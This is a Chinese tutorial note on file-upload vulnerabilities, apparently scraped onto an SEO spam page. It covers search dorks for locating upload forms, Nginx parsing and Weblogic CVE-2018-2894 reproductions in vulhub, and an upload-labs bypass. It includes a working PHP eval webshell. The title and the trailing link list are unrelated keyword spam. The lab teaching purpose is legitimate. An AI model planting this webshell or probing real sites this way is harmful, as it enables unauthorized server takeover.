当前位置: 首页 > news >正文

计算机网站建设与维护长沙企业关键词优化哪家好

计算机网站建设与维护,长沙企业关键词优化哪家好,鲜花店网站建设,wordpress最佳速度优化小迪安全day20WEB漏洞-文件上传之基础及过滤方式 什么是文件上传漏洞 有文件上传就可以测试是否有漏洞,关键看代码是否完备。 服务端代码未对客户端上传的文件进行严格的验证和过滤 漏洞危害 自定义网站后门,获取网站权限,属于高危漏洞。 上…

小迪安全day20WEB漏洞-文件上传之基础及过滤方式

  • 什么是文件上传漏洞

    有文件上传就可以测试是否有漏洞,关键看代码是否完备。

    服务端代码未对客户端上传的文件进行严格的验证和过滤

  • 漏洞危害

    自定义网站后门,获取网站权限,属于高危漏洞

    上传Webshell脚本,网页后门,查看服务器目录,服务器中的文件等

  • 如何查找判断

    • 黑盒查找:不知道源代码情况下,通过目录扫描和网站应用,以及通过网站后台、会员中心进行获取权限,需要自己判断。
    • 白盒查找:通过源代码分析文件上传漏洞。
    • 判断:通过抓包分析
  • 注意事项以及应用说明

    文件上传的区分归类,是编辑器还是第三方应用,还是其它的,再进行后续测试

常规文件上传地址的获取说明

  • 搜索语法搜索关键词

    inurl:upload.php

  • 网站的目录扫描(铸剑)

  • 针对网站进行搜索upload关键词

    site:youku.com upload

  • 网站应用功能

    —上传头像、图片、会员中心、上传视频

不同格式下的文件类型后门测试

后门程序又称特洛伊木马,后门是一种登录系统的方法,它不仅绕过系统已有的安全设置,而且还能挫败系统上各种增强的安全设置。

  • php网站一般上传php后门

  • PHP后门上传格式为JPG(在文件内插入PHP代码)不能执行,不要妄想以图片为后门控制网站

配合解析漏洞下的文件类型后门测试

复现vulhub的nginx解析漏洞

  • cd vulhub/nginx

    ls查看存在的漏洞

    cd nginx_parsing_vulnerability

  • docker-compose up -d启动环境

    docker-compose config查看端口

    ip add show eth0查看ip地址

  • 根据ip地址进入漏洞复现界面

    上传植入后门的图片,进入地址

  • 增加/.php后缀,被解析成PHP文件

本地文件上传漏洞靶场环境搭建测试

搭建upload-labs靶场

Pass-01前端验证

  • 修改JS文件
  • 禁用js
  • 上传png后缀的webshell,代理抓包,修改上传的文件后缀 (推荐)

burpsite抓包,传到repeater模块,插入一句话木马

<?php
phpinfo();
@eval($_POST[xx]);
?>
ps:@是阻断php语句报错的符号,跟在@后面的php语句不会报错

跳转URL至/upload/xxx.php

利用蚁剑连接URL和密码,就可以进入到目标目录

某 CMS 及 CVE 编号文件上传漏洞测试

Weblogic 任意文件上传漏洞(CVE-2018-2894)

  • docker compose logs | grep password获取密码,用于登录进入复现的系统
  • 再根据vulhub官网提示进行复现(jsp文件上传)
http://www.ds6.com.cn/news/103261.html

相关文章:

  • php网站制作网上销售推广方案
  • 制作网站appseo对网络推广的作用是
  • 网站开发用什么企业seo网站营销推广
  • 泉州网站建设哪家好爱站网关键词排名
  • 自己做的网站怎么被百度收录沧州网站运营公司
  • 郑州网站建站百度推广退款电话
  • 网站建设 财务归类5000元网站seo推广
  • 郑州高端网站模板宁波seo快速优化公司
  • wordpress说说伪静态搜索引擎优化文献
  • 成都建站软文兼职
  • wordpress oss 插件优化大师下载电脑版
  • 大型企业网站制作长沙新媒体营销
  • 什么网可以接外贸订单镇江网站关键字优化
  • 广东省深圳市seo管理工具
  • 做网站需要什么开发语言网站应该如何推广
  • 成都建网站要多少钱网站建设与网页设计制作
  • 为什么什么网站都在维护seo搜索引擎优化工资薪酬
  • .net 网站域账号自动验证码品牌型网站设计推荐
  • 知乎 做网站的公司 中企动力今天的新闻内容
  • 查看网站dns短信广告投放软件
  • 网站备案信息被删除怎样建立个人网站
  • 网站建设开发案例公司网站定制
  • 做一个网站需要到哪里做惠州seo排名收费
  • 路由器做网站服务器东莞网站建设最牛
  • 一个专门做标题的网站整站优化关键词推广
  • 怎么网站制作电脑培训班电脑培训学校
  • 做啤酒纸箱包装的网站新闻联播今日新闻
  • 网站开发背景及意义怎样推广自己的网站
  • 长春做网站的公司哪家好搜索指数查询平台
  • 建站吧网站建设网络营销策略的内容